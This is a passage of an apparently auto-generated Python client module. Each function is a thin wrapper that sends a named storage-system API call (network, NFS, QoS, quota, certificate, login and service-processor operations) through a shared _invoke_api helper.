api_call = _invoke_api('net-subnet-get-iter', *args)
return api_call
def net_subnet_modify(*args):
api_call = _invoke_api('net-subnet-modify', *args)
return api_call
def net_subnet_remove_ranges(*args):
api_call = _invoke_api('net-subnet-remove-ranges', *args)
return api_call
def net_subnet_rename(*args):
api_call = _invoke_api('net-subnet-rename', *args)
return api_call
def net_traceroute6(*args):
api_call = _invoke_api('net-traceroute6', *args)
return api_call
def net_vlan_create(*args):
api_call = _invoke_api('net-vlan-create', *args)
return api_call
def net_vlan_delete(*args):
api_call = _invoke_api('net-vlan-delete', *args)
return api_call
def net_vlan_get(*args):
api_call = _invoke_api('net-vlan-get', *args)
return api_call
def net_vlan_get_iter(*args):
api_call = _invoke_api('net-vlan-get-iter', *args)
return api_call
def netgroups_file_delete(*args):
api_call = _invoke_api('netgroups-file-delete', *args)
return api_call
def netgroups_file_get(*args):
api_call = _invoke_api('netgroups-file-get', *args)
return api_call
def netgroups_file_get_iter(*args):
api_call = _invoke_api('netgroups-file-get-iter', *args)
return api_call
def nfs_all_flash_optimized_get(*args):
api_call = _invoke_api('nfs-all-flash-optimized-get', *args)
return api_call
def nfs_all_flash_optimized_get_iter(*args):
api_call = _invoke_api('nfs-all-flash-optimized-get-iter', *args)
return api_call
def nfs_service_get_create_defaults(*args):
api_call = _invoke_api('nfs-service-get-create-defaults', *args)
return api_call
def nfs_service_get_iter(*args):
api_call = _invoke_api('nfs-service-get-iter', *args)
return api_call
def nis_get_iter(*args):
api_call = _invoke_api('nis-get-iter', *args)
return api_call
def ntdtest_action_alt_simpleget(*args):
api_call = _invoke_api('ntdtest-action-alt-simpleget', *args)
return api_call
def ntdtest_action_alt_simpleget_optional(*args):
api_call = _invoke_api('ntdtest-action-alt-simpleget-optional', *args)
return api_call
def ntdtest_action_only_doit(*args):
api_call = _invoke_api('ntdtest-action-only-doit', *args)
return api_call
def ntdtest_action_only_doit_async(*args):
api_call = _invoke_api('ntdtest-action-only-doit-async', *args)
return api_call
def ntdtest_action_only_dothat(*args):
api_call = _invoke_api('ntdtest-action-only-dothat', *args)
return api_call
def ntdtest_action_simpleget(*args):
api_call = _invoke_api('ntdtest-action-simpleget', *args)
return api_call
def ntdtest_action_top_level_create(*args):
api_call = _invoke_api('ntdtest-action-top-level-create', *args)
return api_call
def ntdtest_action_top_level_create_alt(*args):
api_call = _invoke_api('ntdtest-action-top-level-create-alt', *args)
return api_call
def ntdtest_dnested_get(*args):
api_call = _invoke_api('ntdtest-dnested-get', *args)
return api_call
def ntdtest_dnested_get_iter(*args):
api_call = _invoke_api('ntdtest-dnested-get-iter', *args)
return api_call
def ntdtest_empty_tags_get_1(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-1', *args)
return api_call
def ntdtest_empty_tags_get_10(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-10', *args)
return api_call
def ntdtest_empty_tags_get_11(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-11', *args)
return api_call
def ntdtest_empty_tags_get_12(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-12', *args)
return api_call
def ntdtest_empty_tags_get_13(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-13', *args)
return api_call
def ntdtest_empty_tags_get_2(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-2', *args)
return api_call
def ntdtest_empty_tags_get_3(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-3', *args)
return api_call
def ntdtest_empty_tags_get_4(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-4', *args)
return api_call
def ntdtest_empty_tags_get_5(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-5', *args)
return api_call
def ntdtest_empty_tags_get_6(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-6', *args)
return api_call
def ntdtest_empty_tags_get_7(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-7', *args)
return api_call
def ntdtest_empty_tags_get_8(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-8', *args)
return api_call
def ntdtest_empty_tags_get_9(*args):
api_call = _invoke_api('ntdtest-empty-tags-get-9', *args)
return api_call
def ntdtest_extensive_alternate_create_1(*args):
api_call = _invoke_api('ntdtest-extensive-alternate-create-1', *args)
return api_call
def ntdtest_extensive_alternate_create_2(*args):
api_call = _invoke_api('ntdtest-extensive-alternate-create-2', *args)
return api_call
def ntdtest_extensive_alternate_destroy_1(*args):
api_call = _invoke_api('ntdtest-extensive-alternate-destroy-1', *args)
return api_call
def ntdtest_extensive_alternate_get_1(*args):
api_call = _invoke_api('ntdtest-extensive-alternate-get-1', *args)
return api_call
def ntdtest_extensive_alternate_get_2(*args):
api_call = _invoke_api('ntdtest-extensive-alternate-get-2', *args)
return api_call
def ntdtest_extensive_alternate_modify_1(*args):
api_call = _invoke_api('ntdtest-extensive-alternate-modify-1', *args)
return api_call
def ntdtest_extensive_default_create(*args):
api_call = _invoke_api('ntdtest-extensive-default-create', *args)
return api_call
def ntdtest_extensive_default_destroy(*args):
api_call = _invoke_api('ntdtest-extensive-default-destroy', *args)
return api_call
def ntdtest_extensive_default_get(*args):
api_call = _invoke_api('ntdtest-extensive-default-get', *args)
return api_call
def ntdtest_extensive_default_modify(*args):
api_call = _invoke_api('ntdtest-extensive-default-modify', *args)
return api_call
def ntdtest_extensive_destroy_iter(*args):
api_call = _invoke_api('ntdtest-extensive-destroy-iter', *args)
return api_call
def ntdtest_extensive_get_iter(*args):
api_call = _invoke_api('ntdtest-extensive-get-iter', *args)
return api_call
def ntdtest_extensive_method1_alternate(*args):
api_call = _invoke_api('ntdtest-extensive-method1-alternate', *args)
return api_call
def ntdtest_extensive_method1_default(*args):
api_call = _invoke_api('ntdtest-extensive-method1-default', *args)
return api_call
def ntdtest_extensive_method2_alternate(*args):
api_call = _invoke_api('ntdtest-extensive-method2-alternate', *args)
return api_call
def ntdtest_extensive_method2_default(*args):
api_call = _invoke_api('ntdtest-extensive-method2-default', *args)
return api_call
def ntdtest_extensive_method3_default(*args):
api_call = _invoke_api('ntdtest-extensive-method3-default', *args)
return api_call
def ntdtest_extensive_method4_alt(*args):
api_call = _invoke_api('ntdtest-extensive-method4-alt', *args)
return api_call
def ntdtest_extensive_method4_default(*args):
api_call = _invoke_api('ntdtest-extensive-method4-default', *args)
return api_call
def ntdtest_extensive_method5_alternate(*args):
api_call = _invoke_api('ntdtest-extensive-method5-alternate', *args)
return api_call
def ntdtest_extensive_method6_alternate(*args):
api_call = _invoke_api('ntdtest-extensive-method6-alternate', *args)
return api_call
def ntdtest_extensive_method6_alternate_1(*args):
api_call = _invoke_api('ntdtest-extensive-method6-alternate-1', *args)
return api_call
def ntdtest_extensive_method6_default(*args):
api_call = _invoke_api('ntdtest-extensive-method6-default', *args)
return api_call
def ntdtest_extensive_modify_iter(*args):
api_call = _invoke_api('ntdtest-extensive-modify-iter', *args)
return api_call
def ntdtest_folding_create(*args):
api_call = _invoke_api('ntdtest-folding-create', *args)
return api_call
def ntdtest_folding_deep_arrayof_get_iter(*args):
api_call = _invoke_api('ntdtest-folding-deep-arrayof-get-iter', *args)
return api_call
def ntdtest_folding_default_get(*args):
api_call = _invoke_api('ntdtest-folding-default-get', *args)
return api_call
def ntdtest_folding_destroy(*args):
api_call = _invoke_api('ntdtest-folding-destroy', *args)
return api_call
def ntdtest_folding_get(*args):
api_call = _invoke_api('ntdtest-folding-get', *args)
return api_call
def ntdtest_folding_get_collapsed_and_arrayof(*args):
api_call = _invoke_api('ntdtest-folding-get-collapsed-and-arrayof', *args)
return api_call
def ntdtest_folding_get_deep_element(*args):
api_call = _invoke_api('ntdtest-folding-get-deep-element', *args)
return api_call
def ntdtest_folding_get_element_no_array(*args):
api_call = _invoke_api('ntdtest-folding-get-element-no-array', *args)
return api_call
def ntdtest_folding_get_full_list(*args):
api_call = _invoke_api('ntdtest-folding-get-full-list', *args)
return api_call
def ntdtest_folding_get_iter(*args):
api_call = _invoke_api('ntdtest-folding-get-iter', *args)
return api_call
def ntdtest_folding_get_iter_mixed(*args):
api_call = _invoke_api('ntdtest-folding-get-iter-mixed', *args)
return api_call
def ntdtest_folding_get_multiple_field_list_shallow(*args):
api_call = _invoke_api('ntdtest-folding-get-multiple-field-list-shallow', *args)
return api_call
def ntdtest_folding_get_multiple_field_list_top(*args):
api_call = _invoke_api('ntdtest-folding-get-multiple-field-list-top', *args)
return api_call
def ntdtest_folding_get_multiple_fields_list_array_and_collapsed(*args):
api_call = _invoke_api('ntdtest-folding-get-multiple-fields-list-array-and-collapsed', *args)
return api_call
def ntdtest_folding_get_shallow_element(*args):
api_call = _invoke_api('ntdtest-folding-get-shallow-element', *args)
return api_call
def ntdtest_folding_get_single_field_list(*args):
api_call = _invoke_api('ntdtest-folding-get-single-field-list', *args)
return api_call
def ntdtest_folding_list_info(*args):
api_call = _invoke_api('ntdtest-folding-list-info', *args)
return api_call
def ntdtest_folding_list_info_alt(*args):
api_call = _invoke_api('ntdtest-folding-list-info-alt', *args)
return api_call
def ntdtest_folding_list_info_deep_element(*args):
api_call = _invoke_api('ntdtest-folding-list-info-deep-element', *args)
return api_call
def ntdtest_folding_multiple_arrays_create(*args):
api_call = _invoke_api('ntdtest-folding-multiple-arrays-create', *args)
return api_call
def ntdtest_folding_multiple_arrays_destroy(*args):
api_call = _invoke_api('ntdtest-folding-multiple-arrays-destroy', *args)
return api_call
def ntdtest_folding_multiple_arrays_get_iter(*args):
api_call = _invoke_api('ntdtest-folding-multiple-arrays-get-iter', *args)
return api_call
def ntdtest_get(*args):
api_call = _invoke_api('ntdtest-get', *args)
return api_call
def ntdtest_get_iter(*args):
api_call = _invoke_api('ntdtest-get-iter', *args)
return api_call
def ntdtest_iterfrom_alt_create(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-create', *args)
return api_call
def ntdtest_iterfrom_alt_destroy(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-destroy', *args)
return api_call
def ntdtest_iterfrom_alt_destroy_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-destroy-iter', *args)
return api_call
def ntdtest_iterfrom_alt_get(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-get', *args)
return api_call
def ntdtest_iterfrom_alt_get_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-get-iter', *args)
return api_call
def ntdtest_iterfrom_alt_list_info(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-list-info', *args)
return api_call
def ntdtest_iterfrom_alt_modify(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-modify', *args)
return api_call
def ntdtest_iterfrom_alt_modify_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-alt-modify-iter', *args)
return api_call
def ntdtest_iterfrom_create(*args):
api_call = _invoke_api('ntdtest-iterfrom-create', *args)
return api_call
def ntdtest_iterfrom_destroy(*args):
api_call = _invoke_api('ntdtest-iterfrom-destroy', *args)
return api_call
def ntdtest_iterfrom_destroy_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-destroy-iter', *args)
return api_call
def ntdtest_iterfrom_dupe_create(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-create', *args)
return api_call
def ntdtest_iterfrom_dupe_destroy(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-destroy', *args)
return api_call
def ntdtest_iterfrom_dupe_destroy_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-destroy-iter', *args)
return api_call
def ntdtest_iterfrom_dupe_get(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-get', *args)
return api_call
def ntdtest_iterfrom_dupe_get_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-get-iter', *args)
return api_call
def ntdtest_iterfrom_dupe_list_info(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-list-info', *args)
return api_call
def ntdtest_iterfrom_dupe_modify(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-modify', *args)
return api_call
def ntdtest_iterfrom_dupe_modify_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-dupe-modify-iter', *args)
return api_call
def ntdtest_iterfrom_get(*args):
api_call = _invoke_api('ntdtest-iterfrom-get', *args)
return api_call
def ntdtest_iterfrom_get_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-get-iter', *args)
return api_call
def ntdtest_iterfrom_list_info(*args):
api_call = _invoke_api('ntdtest-iterfrom-list-info', *args)
return api_call
def ntdtest_iterfrom_modify(*args):
api_call = _invoke_api('ntdtest-iterfrom-modify', *args)
return api_call
def ntdtest_iterfrom_modify_iter(*args):
api_call = _invoke_api('ntdtest-iterfrom-modify-iter', *args)
return api_call
def ntdtest_iternoread_create(*args):
api_call = _invoke_api('ntdtest-iternoread-create', *args)
return api_call
def ntdtest_iternoread_destroy(*args):
api_call = _invoke_api('ntdtest-iternoread-destroy', *args)
return api_call
def ntdtest_iternoread_destroy_iter(*args):
api_call = _invoke_api('ntdtest-iternoread-destroy-iter', *args)
return api_call
def ntdtest_iternoread_get(*args):
api_call = _invoke_api('ntdtest-iternoread-get', *args)
return api_call
def ntdtest_iternoread_get_alt(*args):
api_call = _invoke_api('ntdtest-iternoread-get-alt', *args)
return api_call
def ntdtest_iternoread_get_iter(*args):
api_call = _invoke_api('ntdtest-iternoread-get-iter', *args)
return api_call
def ntdtest_iternoread_get_iter_alt(*args):
api_call = _invoke_api('ntdtest-iternoread-get-iter-alt', *args)
return api_call
def ntdtest_iternoread_list_info(*args):
api_call = _invoke_api('ntdtest-iternoread-list-info', *args)
return api_call
def ntdtest_iternoread_modify(*args):
api_call = _invoke_api('ntdtest-iternoread-modify', *args)
return api_call
def ntdtest_iternoread_modify_iter(*args):
api_call = _invoke_api('ntdtest-iternoread-modify-iter', *args)
return api_call
def ntdtest_iterwants_get(*args):
api_call = _invoke_api('ntdtest-iterwants-get', *args)
return api_call
def ntdtest_iterwants_get_iter(*args):
api_call = _invoke_api('ntdtest-iterwants-get-iter', *args)
return api_call
def ntdtest_list_non_test_action_default(*args):
api_call = _invoke_api('ntdtest-list-non-test-action-default', *args)
return api_call
def ntdtest_list_non_test_method_default(*args):
api_call = _invoke_api('ntdtest-list-non-test-method-default', *args)
return api_call
def ntdtest_method_only_default(*args):
api_call = _invoke_api('ntdtest-method-only-default', *args)
return api_call
def ntdtest_method_only_method2(*args):
api_call = _invoke_api('ntdtest-method-only-method2', *args)
return api_call
def ntdtest_method_only_method3(*args):
api_call = _invoke_api('ntdtest-method-only-method3', *args)
return api_call
def ntdtest_method_only_method3_a(*args):
api_call = _invoke_api('ntdtest-method-only-method3-a', *args)
return api_call
def ntdtest_method_only_method3_async(*args):
api_call = _invoke_api('ntdtest-method-only-method3-async', *args)
return api_call
def ntdtest_method_only_method3_async_a(*args):
api_call = _invoke_api('ntdtest-method-only-method3-async-a', *args)
return api_call
def ntdtest_method_only_method3_async_iter(*args):
api_call = _invoke_api('ntdtest-method-only-method3-async-iter', *args)
return api_call
def ntdtest_method_only_method3_iter(*args):
api_call = _invoke_api('ntdtest-method-only-method3-iter', *args)
return api_call
def ntdtest_multiple_array_get_deep_element(*args):
api_call = _invoke_api('ntdtest-multiple-array-get-deep-element', *args)
return api_call
def ntdtest_multiple_array_get_shallow_element(*args):
api_call = _invoke_api('ntdtest-multiple-array-get-shallow-element', *args)
return api_call
def ntdtest_multiple_arrays_get_iter(*args):
api_call = _invoke_api('ntdtest-multiple-arrays-get-iter', *args)
return api_call
def ntdtest_multiple_default_method1_alternate(*args):
api_call = _invoke_api('ntdtest-multiple-default-method1-alternate', *args)
return api_call
def ntdtest_multiple_default_method1_default(*args):
api_call = _invoke_api('ntdtest-multiple-default-method1-default', *args)
return api_call
def ntdtest_multiple_inout_method1_alternate(*args):
api_call = _invoke_api('ntdtest-multiple-inout-method1-alternate', *args)
return api_call
def ntdtest_multiple_inout_method1_default(*args):
api_call = _invoke_api('ntdtest-multiple-inout-method1-default', *args)
return api_call
def ntdtest_multiple_with_default_create(*args):
api_call = _invoke_api('ntdtest-multiple-with-default-create', *args)
return api_call
def ntdtest_multiple_with_inout_create(*args):
api_call = _invoke_api('ntdtest-multiple-with-inout-create', *args)
return api_call
def ntdtest_nonlist_get(*args):
api_call = _invoke_api('ntdtest-nonlist-get', *args)
return api_call
def ntdtest_nonlist_get_iter(*args):
api_call = _invoke_api('ntdtest-nonlist-get-iter', *args)
return api_call
def ntdtest_shownoread_default_get(*args):
api_call = _invoke_api('ntdtest-shownoread-default-get', *args)
return api_call
def ntdtest_shownoread_get(*args):
api_call = _invoke_api('ntdtest-shownoread-get', *args)
return api_call
def ntdtest_top_level_alt_create(*args):
api_call = _invoke_api('ntdtest-top-level-alt-create', *args)
return api_call
def ntdtest_top_level_alt_get(*args):
api_call = _invoke_api('ntdtest-top-level-alt-get', *args)
return api_call
def ntdtest_top_level_default_create(*args):
api_call = _invoke_api('ntdtest-top-level-default-create', *args)
return api_call
def ntdtest_top_level_default_destroy(*args):
api_call = _invoke_api('ntdtest-top-level-default-destroy', *args)
return api_call
def ntdtest_top_level_default_get(*args):
api_call = _invoke_api('ntdtest-top-level-default-get', *args)
return api_call
def ntdtest_top_level_default_modify(*args):
api_call = _invoke_api('ntdtest-top-level-default-modify', *args)
return api_call
def ntdtest_top_level_no_inputs_create(*args):
api_call = _invoke_api('ntdtest-top-level-no-inputs-create', *args)
return api_call
def ntdtest_view_alternate_create_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-create-1', *args)
return api_call
def ntdtest_view_alternate_create_2(*args):
api_call = _invoke_api('ntdtest-view-alternate-create-2', *args)
return api_call
def ntdtest_view_alternate_destroy_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-destroy-1', *args)
return api_call
def ntdtest_view_alternate_get_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-get-1', *args)
return api_call
def ntdtest_view_alternate_get_2(*args):
api_call = _invoke_api('ntdtest-view-alternate-get-2', *args)
return api_call
def ntdtest_view_alternate_modify_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-modify-1', *args)
return api_call
def ntdtest_view_default_create(*args):
api_call = _invoke_api('ntdtest-view-default-create', *args)
return api_call
def ntdtest_view_default_destroy(*args):
api_call = _invoke_api('ntdtest-view-default-destroy', *args)
return api_call
def ntdtest_view_default_get(*args):
api_call = _invoke_api('ntdtest-view-default-get', *args)
return api_call
def ntdtest_view_default_modify(*args):
api_call = _invoke_api('ntdtest-view-default-modify', *args)
return api_call
def ntdtest_view_destroy_iter(*args):
api_call = _invoke_api('ntdtest-view-destroy-iter', *args)
return api_call
def ntdtest_view_get_iter(*args):
api_call = _invoke_api('ntdtest-view-get-iter', *args)
return api_call
def ntdtest_view_modify_iter(*args):
api_call = _invoke_api('ntdtest-view-modify-iter', *args)
return api_call
def ntp_server_create(*args):
api_call = _invoke_api('ntp-server-create', *args)
return api_call
def ntp_server_delete(*args):
api_call = _invoke_api('ntp-server-delete', *args)
return api_call
def ntp_server_get(*args):
api_call = _invoke_api('ntp-server-get', *args)
return api_call
def ntp_server_get_iter(*args):
api_call = _invoke_api('ntp-server-get-iter', *args)
return api_call
def ntp_server_modify(*args):
api_call = _invoke_api('ntp-server-modify', *args)
return api_call
def ntp_server_reset(*args):
api_call = _invoke_api('ntp-server-reset', *args)
return api_call
def ntp_server_validate(*args):
api_call = _invoke_api('ntp-server-validate', *args)
return api_call
def options_get_iter(*args):
api_call = _invoke_api('options-get-iter', *args)
return api_call
def options_modify_iter(*args):
api_call = _invoke_api('options-modify-iter', *args)
return api_call
def perf_archive_config_get(*args):
api_call = _invoke_api('perf-archive-config-get', *args)
return api_call
def perf_archive_config_modify(*args):
api_call = _invoke_api('perf-archive-config-modify', *args)
return api_call
def perf_archive_create(*args):
api_call = _invoke_api('perf-archive-create', *args)
return api_call
def perf_archive_datastore_get_iter(*args):
api_call = _invoke_api('perf-archive-datastore-get-iter', *args)
return api_call
def perf_archive_destroy(*args):
api_call = _invoke_api('perf-archive-destroy', *args)
return api_call
def perf_archive_get_iter(*args):
api_call = _invoke_api('perf-archive-get-iter', *args)
return api_call
def perf_archive_modify(*args):
api_call = _invoke_api('perf-archive-modify', *args)
return api_call
def perf_object_counter_list_info(*args):
api_call = _invoke_api('perf-object-counter-list-info', *args)
return api_call
def perf_object_get_instances(*args):
api_call = _invoke_api('perf-object-get-instances', *args)
return api_call
def perf_object_instance_list_info_iter(*args):
api_call = _invoke_api('perf-object-instance-list-info-iter', *args)
return api_call
def perf_object_list_info(*args):
api_call = _invoke_api('perf-object-list-info', *args)
return api_call
def perf_preset_create(*args):
api_call = _invoke_api('perf-preset-create', *args)
return api_call
def perf_preset_delete(*args):
api_call = _invoke_api('perf-preset-delete', *args)
return api_call
def perf_preset_detail_get(*args):
api_call = _invoke_api('perf-preset-detail-get', *args)
return api_call
def perf_preset_get_iter(*args):
api_call = _invoke_api('perf-preset-get-iter', *args)
return api_call
def perf_preset_import(*args):
api_call = _invoke_api('perf-preset-import', *args)
return api_call
def perf_preset_modify(*args):
api_call = _invoke_api('perf-preset-modify', *args)
return api_call
def portset_get_iter(*args):
api_call = _invoke_api('portset-get-iter', *args)
return api_call
def qos_policy_group_create(*args):
api_call = _invoke_api('qos-policy-group-create', *args)
return api_call
def qos_policy_group_delete(*args):
api_call = _invoke_api('qos-policy-group-delete', *args)
return api_call
def qos_policy_group_delete_iter(*args):
api_call = _invoke_api('qos-policy-group-delete-iter', *args)
return api_call
def qos_policy_group_get(*args):
api_call = _invoke_api('qos-policy-group-get', *args)
return api_call
def qos_policy_group_get_iter(*args):
api_call = _invoke_api('qos-policy-group-get-iter', *args)
return api_call
def qos_policy_group_modify(*args):
api_call = _invoke_api('qos-policy-group-modify', *args)
return api_call
def qos_policy_group_modify_iter(*args):
api_call = _invoke_api('qos-policy-group-modify-iter', *args)
return api_call
def qos_policy_group_rename(*args):
api_call = _invoke_api('qos-policy-group-rename', *args)
return api_call
def qos_settings_control_get(*args):
api_call = _invoke_api('qos-settings-control-get', *args)
return api_call
def qos_settings_control_modify(*args):
api_call = _invoke_api('qos-settings-control-modify', *args)
return api_call
def qos_settings_read_ahead_create(*args):
api_call = _invoke_api('qos-settings-read-ahead-create', *args)
return api_call
def qos_settings_read_ahead_destroy(*args):
api_call = _invoke_api('qos-settings-read-ahead-destroy', *args)
return api_call
def qos_settings_read_ahead_destroy_iter(*args):
api_call = _invoke_api('qos-settings-read-ahead-destroy-iter', *args)
return api_call
def qos_settings_read_ahead_get(*args):
api_call = _invoke_api('qos-settings-read-ahead-get', *args)
return api_call
def qos_settings_read_ahead_get_iter(*args):
api_call = _invoke_api('qos-settings-read-ahead-get-iter', *args)
return api_call
def qos_settings_read_ahead_modify(*args):
api_call = _invoke_api('qos-settings-read-ahead-modify', *args)
return api_call
def qos_settings_read_ahead_modify_iter(*args):
api_call = _invoke_api('qos-settings-read-ahead-modify-iter', *args)
return api_call
def qos_test_smf_zapi_error(*args):
api_call = _invoke_api('qos-test-smf-zapi-error', *args)
return api_call
def qos_workload_delete(*args):
api_call = _invoke_api('qos-workload-delete', *args)
return api_call
def qos_workload_delete_iter(*args):
api_call = _invoke_api('qos-workload-delete-iter', *args)
return api_call
def qos_workload_get(*args):
api_call = _invoke_api('qos-workload-get', *args)
return api_call
def qos_workload_get_iter(*args):
api_call = _invoke_api('qos-workload-get-iter', *args)
return api_call
def qos_workload_modify(*args):
api_call = _invoke_api('qos-workload-modify', *args)
return api_call
def qos_workload_modify_iter(*args):
api_call = _invoke_api('qos-workload-modify-iter', *args)
return api_call
def qtree_list_iter(*args):
api_call = _invoke_api('qtree-list-iter', *args)
return api_call
def quota_list_entries_iter(*args):
api_call = _invoke_api('quota-list-entries-iter', *args)
return api_call
def quota_policy_copy(*args):
api_call = _invoke_api('quota-policy-copy', *args)
return api_call
def quota_policy_create(*args):
api_call = _invoke_api('quota-policy-create', *args)
return api_call
def quota_policy_delete_iter(*args):
api_call = _invoke_api('quota-policy-delete-iter', *args)
return api_call
def quota_policy_get_iter(*args):
api_call = _invoke_api('quota-policy-get-iter', *args)
return api_call
def quota_policy_rename(*args):
api_call = _invoke_api('quota-policy-rename', *args)
return api_call
def quota_policy_rule_count_get_iter(*args):
api_call = _invoke_api('quota-policy-rule-count-get-iter', *args)
return api_call
def quota_report_iter(*args):
api_call = _invoke_api('quota-report-iter', *args)
return api_call
def quota_status_iter(*args):
api_call = _invoke_api('quota-status-iter', *args)
return api_call
def raidgroup_get_iter(*args):
api_call = _invoke_api('raidgroup-get-iter', *args)
return api_call
def security_certificate_ca_issued_get_iter(*args):
api_call = _invoke_api('security-certificate-ca-issued-get-iter', *args)
return api_call
def security_certificate_create(*args):
api_call = _invoke_api('security-certificate-create', *args)
return api_call
def security_certificate_delete(*args):
api_call = _invoke_api('security-certificate-delete', *args)
return api_call
def security_certificate_delete_iter(*args):
api_call = _invoke_api('security-certificate-delete-iter', *args)
return api_call
def security_certificate_file_get_iter(*args):
api_call = _invoke_api('security-certificate-file-get-iter', *args)
return api_call
def security_certificate_generate_csr(*args):
api_call = _invoke_api('security-certificate-generate-csr', *args)
return api_call
def security_certificate_get_iter(*args):
api_call = _invoke_api('security-certificate-get-iter', *args)
return api_call
def security_certificate_install(*args):
api_call = _invoke_api('security-certificate-install', *args)
return api_call
def security_certificate_revoke(*args):
api_call = _invoke_api('security-certificate-revoke', *args)
return api_call
def security_certificate_sign(*args):
api_call = _invoke_api('security-certificate-sign', *args)
return api_call
def security_key_manager_add_iter(*args):
api_call = _invoke_api('security-key-manager-add-iter', *args)
return api_call
def security_key_manager_create_key(*args):
api_call = _invoke_api('security-key-manager-create-key', *args)
return api_call
def security_key_manager_delete_iter(*args):
api_call = _invoke_api('security-key-manager-delete-iter', *args)
return api_call
def security_key_manager_get(*args):
api_call = _invoke_api('security-key-manager-get', *args)
return api_call
def security_key_manager_get_iter(*args):
api_call = _invoke_api('security-key-manager-get-iter', *args)
return api_call
def security_key_manager_query_get(*args):
api_call = _invoke_api('security-key-manager-query-get', *args)
return api_call
def security_key_manager_query_get_iter(*args):
api_call = _invoke_api('security-key-manager-query-get-iter', *args)
return api_call
def security_key_manager_restore_get(*args):
api_call = _invoke_api('security-key-manager-restore-get', *args)
return api_call
def security_key_manager_restore_get_iter(*args):
api_call = _invoke_api('security-key-manager-restore-get-iter', *args)
return api_call
def security_key_manager_setup(*args):
api_call = _invoke_api('security-key-manager-setup', *args)
return api_call
def security_login_create(*args):
api_call = _invoke_api('security-login-create', *args)
return api_call
def security_login_delete(*args):
api_call = _invoke_api('security-login-delete', *args)
return api_call
def security_login_delete_iter(*args):
api_call = _invoke_api('security-login-delete-iter', *args)
return api_call
def security_login_get(*args):
api_call = _invoke_api('security-login-get', *args)
return api_call
def security_login_get_iter(*args):
api_call = _invoke_api('security-login-get-iter', *args)
return api_call
def security_login_lock(*args):
api_call = _invoke_api('security-login-lock', *args)
return api_call
def security_login_modify(*args):
api_call = _invoke_api('security-login-modify', *args)
return api_call
def security_login_modify_iter(*args):
api_call = _invoke_api('security-login-modify-iter', *args)
return api_call
def security_login_modify_password(*args):
api_call = _invoke_api('security-login-modify-password', *args)
return api_call
def security_login_role_config_get(*args):
api_call = _invoke_api('security-login-role-config-get', *args)
return api_call
def security_login_role_config_get_iter(*args):
api_call = _invoke_api('security-login-role-config-get-iter', *args)
return api_call
def security_login_role_config_modify(*args):
api_call = _invoke_api('security-login-role-config-modify', *args)
return api_call
def security_login_role_config_modify_iter(*args):
api_call = _invoke_api('security-login-role-config-modify-iter', *args)
return api_call
def security_login_role_create(*args):
api_call = _invoke_api('security-login-role-create', *args)
return api_call
def security_login_role_delete(*args):
api_call = _invoke_api('security-login-role-delete', *args)
return api_call
def security_login_role_delete_iter(*args):
api_call = _invoke_api('security-login-role-delete-iter', *args)
return api_call
def security_login_role_get(*args):
api_call = _invoke_api('security-login-role-get', *args)
return api_call
def security_login_role_get_iter(*args):
api_call = _invoke_api('security-login-role-get-iter', *args)
return api_call
def security_login_role_modify(*args):
api_call = _invoke_api('security-login-role-modify', *args)
return api_call
def security_login_role_modify_iter(*args):
api_call = _invoke_api('security-login-role-modify-iter', *args)
return api_call
def security_login_unlock(*args):
api_call = _invoke_api('security-login-unlock', *args)
return api_call
def security_reset(*args):
api_call = _invoke_api('security-reset', *args)
return api_call
def security_ssh_add(*args):
api_call = _invoke_api('security-ssh-add', *args)
return api_call
def security_ssh_get_iter(*args):
api_call = _invoke_api('security-ssh-get-iter', *args)
return api_call
def security_ssh_remove(*args):
api_call = _invoke_api('security-ssh-remove', *args)
return api_call
def security_ssl_get_iter(*args):
api_call = _invoke_api('security-ssl-get-iter', *args)
return api_call
def security_ssl_modify(*args):
api_call = _invoke_api('security-ssl-modify', *args)
return api_call
def security_trace_filter_get_iter(*args):
api_call = _invoke_api('security-trace-filter-get-iter', *args)
return api_call
def security_trace_result_show(*args):
api_call = _invoke_api('security-trace-result-show', *args)
return api_call
def service_processor_api_service_get(*args):
api_call = _invoke_api('service-processor-api-service-get', *args)
return api_call
def service_processor_api_service_modify(*args):
api_call = _invoke_api('service-processor-api-service-modify', *args)
return api_call
def service_processor_api_service_renew_certificates(*args):
api_call = _invoke_api('service-processor-api-service-renew-certificates', *args)
return api_call
def service_processor_asup_config_get(*args):
api_call = _invoke_api('service-processor-asup-config-get', *args)
return api_call
def service_processor_asup_config_set(*args):
api_call = _invoke_api('service-processor-asup-config-set', *args)
return api_call
def service_processor_asup_invoke(*args):
api_call = _invoke_api('service-processor-asup-invoke', *args)
return api_call
def service_processor_auto_configuration_disable(*args):
api_call = _invoke_api('service-processor-auto-configuration-disable', *args)
return api_call
def service_processor_auto_configuration_enable(*args):
api_call = _invoke_api('service-processor-auto-configuration-enable', *args)
return api_call
